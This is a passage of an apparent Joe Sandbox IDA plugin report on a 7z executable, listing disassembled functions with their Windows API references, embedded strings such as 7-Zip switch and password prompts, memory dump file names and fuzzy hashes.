Instruction Fuzzy Hash: 9741D26235478291DA299F65DA503EA7364F7C5BA0F4486229F6E073D1CF3CD898D305

Function 009B12B0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 009B12DC
fputs.MSVCRT ref: 009B137C
fputs.MSVCRT ref: 009B139C
free.MSVCRT ref: 009B13D3
LeaveCriticalSection.KERNEL32 ref: 009B13EB

Strings

: , xrefs: 009B1395

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID: CriticalSectionfputs$EnterLeavefree
String ID: :
API String ID: 1989314732-3653984579
Opcode ID: a9e7b779069d7613123e0b6a527abe8c78201bf88696ae9abb195fc48f8ffdd4
Instruction ID: bf77c0c6be3a7ea3b5a879f8c3c00a8e45101b3bef6b7f44ed43d51f54add6be
Opcode Fuzzy Hash: a9e7b779069d7613123e0b6a527abe8c78201bf88696ae9abb195fc48f8ffdd4
Instruction Fuzzy Hash: D6310C72210A4081DB25AF29D9953DD3360F789FA8F989236DE5E4B7A9DF78C885C310

Function 009BCE50 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 77COMMON

Download Yara Rule

APIs

fputs.MSVCRT ref: 009BCE70

Part of subcall function 009722E4: fflush.MSVCRT ref: 009722EB

GetStdHandle.KERNEL32 ref: 009BCE83
GetConsoleMode.KERNEL32 ref: 009BCEAA
SetConsoleMode.KERNEL32 ref: 009BCEBE
SetConsoleMode.KERNEL32 ref: 009BCEE8

Strings

Enter password (will not be echoed):, xrefs: 009BCE69

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID: ConsoleMode$Handlefflushfputs
String ID: Enter password (will not be echoed):
API String ID: 108775803-3720017889
Opcode ID: b3b14cee00391645aedadfe40ccae594c45a57101052151f518e341e407f9c9a
Instruction ID: 94cf45557cf53e82886bd6ac6dd21a3fb444ab05a1c5f2878b9b4ee093ff87d8
Opcode Fuzzy Hash: b3b14cee00391645aedadfe40ccae594c45a57101052151f518e341e407f9c9a
Instruction Fuzzy Hash: 3E21FC6330560182EE289B66AF147B96365AF88BB1F185625EE2B4B3F5DF7CCC45C300

Function 009B1AA8 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 66COMMON

Download Yara Rule

APIs

fputs.MSVCRT ref: 009B1ACD
free.MSVCRT ref: 009B1B97

Strings

WARNING:, xrefs: 009B1AC6
Can not open the file, xrefs: 009B1B34
The archive is open with offset, xrefs: 009B1B02
The file is open, xrefs: 009B1B60

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID: fputsfree
String ID: Can not open the file$The archive is open with offset$The file is open$WARNING:
API String ID: 2581285248-3393983761
Opcode ID: 508089e93e5762c25ef1d7ab05736a957ed921444384873a384d5238f926eb99
Instruction ID: 2bbd294627f8b0b91778e9567d1ff3ec448f36e51943445797b1dc2ee738e664
Opcode Fuzzy Hash: 508089e93e5762c25ef1d7ab05736a957ed921444384873a384d5238f926eb99
Instruction Fuzzy Hash: DD218363310A4595DE24EF26E86079D6730F7C9BE4F948222EE5E47369EF28C649C700

Function 009A7614 Relevance: 10.2, APIs: 8, Instructions: 196COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 009A7668
free.MSVCRT ref: 009A7670
free.MSVCRT ref: 009A7882
free.MSVCRT ref: 009A789D

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: b12077aa1a38d381980969ace034f6b3563fad09e3fe92ca21f67a48a02744cb
Instruction ID: 8405b0e9d5a96000a031a0fbbbbd7ff15fae9c1058f24fa756bef4645ef3372f
Opcode Fuzzy Hash: b12077aa1a38d381980969ace034f6b3563fad09e3fe92ca21f67a48a02744cb
Instruction Fuzzy Hash: 0F71C02321C6C096CA20EB69E88579EF764F7CA750FA49112EBDA43B59CF3CC945CB40

Function 0099BB68 Relevance: 10.1, APIs: 8, Instructions: 136COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 0099BBD6
free.MSVCRT ref: 0099BC04

Part of subcall function 00973404: free.MSVCRT ref: 00973431
Part of subcall function 00973404: memmove.MSVCRT ref: 0097344C

free.MSVCRT ref: 0099BC1D
free.MSVCRT ref: 0099BC33
free.MSVCRT ref: 0099BC41
free.MSVCRT ref: 0099BCFA
free.MSVCRT ref: 0099BD0E

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID: free$memmove
String ID:
API String ID: 1534225298-0
Opcode ID: 13471f8a4ad2e7cf6aac41453100c4caf2e4d0bde65bb17a80b5ab02e2c60358
Instruction ID: ff56c92e4b09f48a34936a8e368bcdb00ac4c44a979ab3595b032ecbbb266a3a
Opcode Fuzzy Hash: 13471f8a4ad2e7cf6aac41453100c4caf2e4d0bde65bb17a80b5ab02e2c60358
Instruction Fuzzy Hash: 4941F36320868481CF35AF2DF50136D3760E7D2B98F188112EA9E077A5EFBDC986C700

Function 00990A58 Relevance: 10.1, APIs: 8, Instructions: 90COMMON

Download Yara Rule

APIs

memmove.MSVCRT ref: 00990A91
free.MSVCRT ref: 00990A99

Part of subcall function 00972130: malloc.MSVCRT ref: 00972134
Part of subcall function 00972130: _CxxThrowException.MSVCRT ref: 0097214F

memmove.MSVCRT ref: 00990AD4
free.MSVCRT ref: 00990ADD
memmove.MSVCRT ref: 00990B19
free.MSVCRT ref: 00990B22
memmove.MSVCRT ref: 00990B5B
free.MSVCRT ref: 00990B64

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID: freememmove$ExceptionThrowmalloc
String ID:
API String ID: 1818558235-0
Opcode ID: 198f322d7e3605dd07b0a7db7330dd27ffa8d5d8ef2ff35b5f10ecada0f47089
Instruction ID: c4aa4d7144fd7320ff7c37d8286a55c1cc7ecd13c45d0c1802576c3ca07bff80
Opcode Fuzzy Hash: 198f322d7e3605dd07b0a7db7330dd27ffa8d5d8ef2ff35b5f10ecada0f47089
Instruction Fuzzy Hash: 943138B27122908B8B64DF7BD49262D73A8F7C4FD83148026DF2D97709DA24D882CB90

Function 009A3162 Relevance: 10.0, APIs: 8, Instructions: 42COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 009A3174
free.MSVCRT ref: 009A317E
free.MSVCRT ref: 009A3189
free.MSVCRT ref: 009A3197
free.MSVCRT ref: 009A31C0
free.MSVCRT ref: 009A31C9
free.MSVCRT ref: 009A31D7
free.MSVCRT ref: 009A31E2

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: 5bbcb3d30417cb4540914b84c838161a17fbf1d04a96b1a44235b1ed78704236
Instruction ID: 7d9c5ec8d8a05f935a1e36defa9b70f22f7f827480138d778b47a0c1b2f51f89
Opcode Fuzzy Hash: 5bbcb3d30417cb4540914b84c838161a17fbf1d04a96b1a44235b1ed78704236
Instruction Fuzzy Hash: A3F0302326E69085CA14FF33C89572E6751FBC7F81F84A461EB4E63716CE28C406C614

Function 009A30A8 Relevance: 10.0, APIs: 8, Instructions: 41COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 009A30BA
free.MSVCRT ref: 009A30C4
free.MSVCRT ref: 009A30CF
free.MSVCRT ref: 009A30DD
free.MSVCRT ref: 009A3104
free.MSVCRT ref: 009A310D
free.MSVCRT ref: 009A311B
free.MSVCRT ref: 009A3126

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: f923bc8cdedd78b2b3edc0c739dd55c56a96e84a99f4fb77f0cef0815a61bf65
Instruction ID: 7ab09328bf0e9750e27adc5be35e2d9d832324c57f8991e7d162eca6bc223947
Opcode Fuzzy Hash: f923bc8cdedd78b2b3edc0c739dd55c56a96e84a99f4fb77f0cef0815a61bf65
Instruction Fuzzy Hash: C8F0D02726E99045CA14FF33C8A572F6711F7C3F85F459461AB4E63715CE28C446C615

Function 009A324C Relevance: 10.0, APIs: 8, Instructions: 41COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 009A325E
free.MSVCRT ref: 009A3268
free.MSVCRT ref: 009A3273
free.MSVCRT ref: 009A3281
free.MSVCRT ref: 009A32A8
free.MSVCRT ref: 009A32B1
free.MSVCRT ref: 009A32BF
free.MSVCRT ref: 009A32CA

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: 2522e248d28b65a1e432d56d56702000484c5aa2c33acbb552cec4aae837ae87
Instruction ID: d52be89e58486fa9ad532ed5b75c4fbdf9b2c17016aa3ea9ba5126b0f8177224
Opcode Fuzzy Hash: 2522e248d28b65a1e432d56d56702000484c5aa2c33acbb552cec4aae837ae87
Instruction Fuzzy Hash: B6F030232AEA8141CA10FF33C895B2F6721F7C3F81F859051AF4E63711CE28C406C614

Function 009A333D Relevance: 10.0, APIs: 8, Instructions: 40COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 009A334F
free.MSVCRT ref: 009A3359
free.MSVCRT ref: 009A3364
free.MSVCRT ref: 009A3372
free.MSVCRT ref: 009A3399
free.MSVCRT ref: 009A33A2
free.MSVCRT ref: 009A33B0
free.MSVCRT ref: 009A33BB

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: eef51832cb1860b1a47471d2ecdbd40fe6516d0eb3dd3788043c37f3bbfc7144
Instruction ID: c0493047a673e48a6decf6cb8587f12cc8898eabfe3417761711fabe9c3d8d80
Opcode Fuzzy Hash: eef51832cb1860b1a47471d2ecdbd40fe6516d0eb3dd3788043c37f3bbfc7144
Instruction Fuzzy Hash: CDF0D02326E59085CA14FF33D4A576E6721FBC7F81F859461AB4E53716CE28C406C614

Function 009A2E29 Relevance: 10.0, APIs: 8, Instructions: 40COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 009A2E3B
free.MSVCRT ref: 009A2E45
free.MSVCRT ref: 009A2E50
free.MSVCRT ref: 009A2E5E
free.MSVCRT ref: 009A2E87
free.MSVCRT ref: 009A2E90
free.MSVCRT ref: 009A2E9E
free.MSVCRT ref: 009A2EA9

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: c5174ab1f7993f2eec1200e5e986d705cda821f000588a3ae1e3b292e3927ade
Instruction ID: d4ff9b5c1e2945a52e588959a74cf945869490eef51ef323d878ccda8c46a873
Opcode Fuzzy Hash: c5174ab1f7993f2eec1200e5e986d705cda821f000588a3ae1e3b292e3927ade
Instruction Fuzzy Hash: 14F0F42326E59045CA14FF37D45572F6751FBC7F81F459461AB4E63716CE28C406C614

Function 009A2EDB Relevance: 10.0, APIs: 8, Instructions: 38COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 009A2EE3
free.MSVCRT ref: 009A2EED
free.MSVCRT ref: 009A2EF8
free.MSVCRT ref: 009A2F06
free.MSVCRT ref: 009A2F2F
free.MSVCRT ref: 009A2F38
free.MSVCRT ref: 009A2F46
free.MSVCRT ref: 009A2F51

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: 73516b05c5aded9222374f9846cd335e674db6f98022afe4c7a0822642a89c91
Instruction ID: 9faedec5bdf87c659eb9fe08afb34b6b9615b35a2e7b617c9a51be18b1524e2b
Opcode Fuzzy Hash: 73516b05c5aded9222374f9846cd335e674db6f98022afe4c7a0822642a89c91
Instruction Fuzzy Hash: A9F0FE2326A98085CA14FF37D46172F6320FBC7F81F81A461AB4F63711CE28C406C619

Function 009A2F97 Relevance: 10.0, APIs: 8, Instructions: 38COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 009A2F9F
free.MSVCRT ref: 009A2FA9
free.MSVCRT ref: 009A2FB4
free.MSVCRT ref: 009A2FC2
free.MSVCRT ref: 009A2FEB
free.MSVCRT ref: 009A2FF4
free.MSVCRT ref: 009A3002
free.MSVCRT ref: 009A300D

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: 542bf3f330fecf80eaa0ec81e7d53865c449308f14702187d1a118dc28be755e
Instruction ID: 68c4224e0a609a822a38ab052592f70ac49d783696536ebb0f337ecbd956a547
Opcode Fuzzy Hash: 542bf3f330fecf80eaa0ec81e7d53865c449308f14702187d1a118dc28be755e
Instruction Fuzzy Hash: 48F0A22326E99485CA14FF37D46572F6320FBC7F81F81A461AB4E63716DE28C406C615

Function 009BB310 Relevance: 10.0, APIs: 8, Instructions: 34COMMON

Download Yara Rule

APIs

Part of subcall function 009BB1C8: memset.MSVCRT ref: 009BB20D
Part of subcall function 009BB1C8: fputs.MSVCRT ref: 009BB232

free.MSVCRT ref: 009BB335
free.MSVCRT ref: 009BB342
free.MSVCRT ref: 009BB34E
free.MSVCRT ref: 009BB358
free.MSVCRT ref: 009BB362
free.MSVCRT ref: 009BB36C
free.MSVCRT ref: 009BB376
free.MSVCRT ref: 009BB380

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID: free$fputsmemset
String ID:
API String ID: 469995913-0
Opcode ID: d08ec6cc8013b459c16a183cb8820a8405a66458fcd2ec61ca7be2be00b49645
Instruction ID: c98331d362a53a3118bf29bcaca662eb4c58981d8cd19e1fad19eea02eabd328
Opcode Fuzzy Hash: d08ec6cc8013b459c16a183cb8820a8405a66458fcd2ec61ca7be2be00b49645
Instruction Fuzzy Hash: A2F0D02326994081CB10FF37D89262D2321F7C3F68B449261AF6D573AACE24C843C368

Function 00996484 Relevance: 9.2, APIs: 6, Instructions: 177COMMON

Download Yara Rule

APIs

wcscmp.MSVCRT ref: 009964F9
free.MSVCRT ref: 0099659C
free.MSVCRT ref: 00996602
free.MSVCRT ref: 0099660A
memmove.MSVCRT ref: 00996627
free.MSVCRT ref: 009966A6

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID: free$memmovewcscmp
String ID:
API String ID: 3584677832-0
Opcode ID: c7d24e90d75f8b1a8df411daada06ff9b67f26deec57412286e52ff39d8a267a
Instruction ID: 0712f551d7d9219b0b87b1159cc4e3e3f098b4a18e05cefc1726b52b52acbfaa
Opcode Fuzzy Hash: c7d24e90d75f8b1a8df411daada06ff9b67f26deec57412286e52ff39d8a267a
Instruction Fuzzy Hash: 1651E433200A8486CF20EF1ED59026D7765F3D4B98B99C126EB9E0B729DF39D886C701

Function 00971364 Relevance: 9.2, APIs: 1, Strings: 5, Instructions: 172COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 00971558

Strings

Incorrect switch postfix:, xrefs: 009714F8, 00971584
Unknown switch:, xrefs: 0097142C
Too short switch:, xrefs: 0097148A
Too long switch:, xrefs: 0097159F
Multiple instances for switch:, xrefs: 0097145B

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID: free
String ID: Incorrect switch postfix:$Multiple instances for switch:$Too long switch:$Too short switch:$Unknown switch:
API String ID: 1294909896-2104980125
Opcode ID: ed70e3db481bbb30983a976b6095b32a572669940faca3c9e13180f1720175d4
Instruction ID: 2895407f9aa95aa74a2069efb492d19e305d88de59ca375dc6537505a2077e43
Opcode Fuzzy Hash: ed70e3db481bbb30983a976b6095b32a572669940faca3c9e13180f1720175d4
Instruction Fuzzy Hash: A951CC73224690A7CF35EF28E5803AD7765F381394F84C622EA9E47756EB38C986D700

Function 00980358 Relevance: 9.1, APIs: 4, Strings: 2, Instructions: 143COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 009804EE

Part of subcall function 0097FEC8: _CxxThrowException.MSVCRT ref: 0097FF2F
Part of subcall function 0097FEC8: free.MSVCRT ref: 0097FFAE
Part of subcall function 0097FEC8: _CxxThrowException.MSVCRT ref: 0097FFD1
Part of subcall function 0097FEC8: _CxxThrowException.MSVCRT ref: 0097FFF7
Part of subcall function 0097FEC8: _CxxThrowException.MSVCRT ref: 0098002B

free.MSVCRT ref: 00980523
_CxxThrowException.MSVCRT ref: 00980564

Strings

Too short switch, xrefs: 0098050C, 00980515
Incorrect wildcard type marker, xrefs: 0098052A

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID: ExceptionThrow$free
String ID: Incorrect wildcard type marker$Too short switch
API String ID: 3129652135-1817034180
Opcode ID: f2458bf291f458b2712c5f00df2031021bba44effe0b8784fcef15973866768f
Instruction ID: 6a5f7309aeec84503758d067f3a9bbd2baf2e90053c46692bcba8ecc88681e3b
Opcode Fuzzy Hash: f2458bf291f458b2712c5f00df2031021bba44effe0b8784fcef15973866768f
Instruction Fuzzy Hash: 7D51BF232086D4C5DB60EB26E4507AEBB24F7C5B94F958116EF8907B65EB38C58ACB10

Function 009AE2F0 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 133COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 009AE36E
free.MSVCRT ref: 009AE3C8
free.MSVCRT ref: 009AE44C

Part of subcall function 00973404: free.MSVCRT ref: 00973431
Part of subcall function 00973404: memmove.MSVCRT ref: 0097344C

free.MSVCRT ref: 009AE486
free.MSVCRT ref: 009AE4E4

Strings

#, xrefs: 009AE494

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID: free$memmove
String ID: #
API String ID: 1534225298-1885708031
Opcode ID: 88dd9615235185287fb0baae77512b6b30fd0ad49e52e1feae422806fc2f9e0a
Instruction ID: d27926ebda9eb4b88782e8b74c67dfd4ef91f51ad401a0ada0ad49092217117a
Opcode Fuzzy Hash: 88dd9615235185287fb0baae77512b6b30fd0ad49e52e1feae422806fc2f9e0a
Instruction Fuzzy Hash: 5F516327318B8482CB60DB2AE49076E7769F7C9B94F544211EB9E437A5DF3CC849C740

Function 009B2688 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 126stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 009B273A
strlen.MSVCRT ref: 009B2749
memset.MSVCRT ref: 009B2767
strlen.MSVCRT ref: 009B27EB
memset.MSVCRT ref: 009B2811

Part of subcall function 009BB1C8: memset.MSVCRT ref: 009BB20D
Part of subcall function 009BB1C8: fputs.MSVCRT ref: 009BB232

Strings

, xrefs: 009B2818

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID: memsetstrlen$fputs
String ID:
API String ID: 2256168112-2735817509
Opcode ID: ad0d7bef1b919bc72df3f5cae30fb1075d7da1c7e795fc3f1bc43048049e5982
Instruction ID: f4a7e18f72261fe8b73ab6f5498231c8fd5164e1fe8bc63509d1722e2303db50
